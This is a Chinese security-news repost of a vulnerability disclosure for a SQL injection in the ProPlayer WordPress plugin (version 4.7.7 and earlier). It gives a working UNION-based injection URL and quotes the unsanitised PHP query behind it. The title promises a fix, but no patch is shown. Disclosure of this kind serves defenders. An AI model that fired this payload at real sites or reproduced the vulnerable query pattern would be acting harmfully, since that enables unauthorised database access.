频道栏目
首页 > 资讯 > 网站安全 > 正文

ProPlayer plugin <= 4.7.7 SQL注射缺陷及修复

11-08-06        来源:[db:作者]  
收藏   我要投稿

# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: ../../proplayer.4.7.7.zip
# Version: 4.7.7 (tested)
 
---
PoC
---
http://www.2cto.com /wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=-1') UNION ALL SELECT NULL,NULL,@@version--%20
 
---------------
Vulnerable code
---------------
function getPlaylist($id = '') {
    $query = mysql_query("SELECT * FROM ".$this->tablePrefix."proplayer_playlist WHERE (POST_ID='$id')");
    $playlistRow = mysql_fetch_row($query);
    
    return $this->withBackwardCompatibility($playlistRow[2]);
}
 
...
 
if (!empty($_GET["pp_playlist_id"])) {
    header("Content-type: application/xml");
    $xml = $playlistController->getPlaylist($_GET["pp_playlist_id"]);
 

相关TAG标签
上一篇:Social Slider <= 5.6.5 SQL注射缺陷及修复
下一篇:NetScreen防火墙帮你检测和防御九种DoS攻击
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站